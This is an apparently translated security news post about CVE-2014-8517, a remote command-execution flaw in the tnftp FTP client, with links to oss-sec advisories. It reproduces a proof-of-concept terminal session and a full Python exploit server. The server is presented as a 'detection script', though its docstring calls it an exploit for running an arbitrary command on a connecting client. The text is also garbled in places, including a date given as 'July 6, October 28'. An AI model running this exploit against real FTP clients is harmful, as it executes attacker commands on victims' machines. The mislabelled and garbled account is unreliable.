Vulnerability warning: FTP exposes a severe remote execution vulnerability, affecting multiple versions of Linux (with a detection script)

Vulnerability warning: FTP exposes a severe remote execution vulnerability, affecting multiple versions of Linux (with a detection script)

On July 6, October 28, a public email showed the FTP remote command execution vulnerability. The vulnerability affected Linux systems include: Fedora, Debian, NetBSD, FreeBSD, OpenBSD, it even affected the latest version of ios OS X, Yosemite 10.10.

A NetBSD developer (Jared McNeill) confirms that the vulnerability has allowed WEB servers to remotely execute malicious commands through tnftp and that the vulnerability has been numbered as a CVE-2014-8517:

a20$ pwd    /var/www/cgi-bin a20$ ls -l    total 4      -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect    -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a a20$ cat redirect    #!/bin/sh      echo 'Status: 302 Found'      echo 'Content-Type: text/html'      echo 'Connection: keep-alive'      echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'      echo a20$a20$ ftp http://localhost/cgi-bin/redirect  Trying ::1:80 ...    ftp: Can't connect to `::1:80': Connection refused  Trying 127.0.0.1:80 ...    Requesting http://localhost/cgi-bin/redirect  Redirected to http://192.168.2.19/cgi-bin/|uname%20-a  Requesting http://192.168.2.19/cgi-bin/|uname%20-a      32      101.46 KiB/s  32 bytes retrieved in 00:00 (78.51 KiB/s)    NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36    ADT 2014    Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE  BOARD evbarm a20$

 

Vulnerability impact scope and announcement

System developers such as Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple are aware of the hazards caused by this vulnerability. Among them, Debian, Red Hat, gnetoo and Novell have issued a vulnerability announcement:

Vulnerability Detection script(Do not use it for illegal purposes)
 

#!/usr/bin/env python """ Sample OSX/BSD FTP client exploit. Written because ISO policies were doing my head in. To exploit, edit the value of the cmd variable, then run the script. To test:       ftp http://<myserver>/foo   And you should see the command executed.   All wrongs reversed - @stevelord """ import BaseHTTPServer import sys import socket import urllib   hostname = socket.getfqdn() # Set this to your IP if you have no FQDN port = 8000 # Set this to the port you want to run this on cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying." cmd = urllib.quote(cmd) redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd  class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(s): if cmd in s.path: s.send_response(200) s.end_headers() else: s.send_response(302) s.send_header("Location", redir) s.end_headers() if __name__ == "__main__": print "redirecting to,", redir     server_class = BaseHTTPServer.HTTPServer httpd = server_class((hostname, port), RedirectHandler) try: httpd.serve_forever() print "Started serving." except KeyboardInterrupt: pass httpd.server_close() print "\nStopped serving." 

 

 

For more information about the solution, see:

Http://seclists.org/oss-sec/2014/q4/459 http://seclists.org/oss-sec/2014/q4/464

Http://seclists.org/oss-sec/2014/q4/460

[Reference Information Source: nix-systems-affected-ftp-remote-command-execution-vulnerability]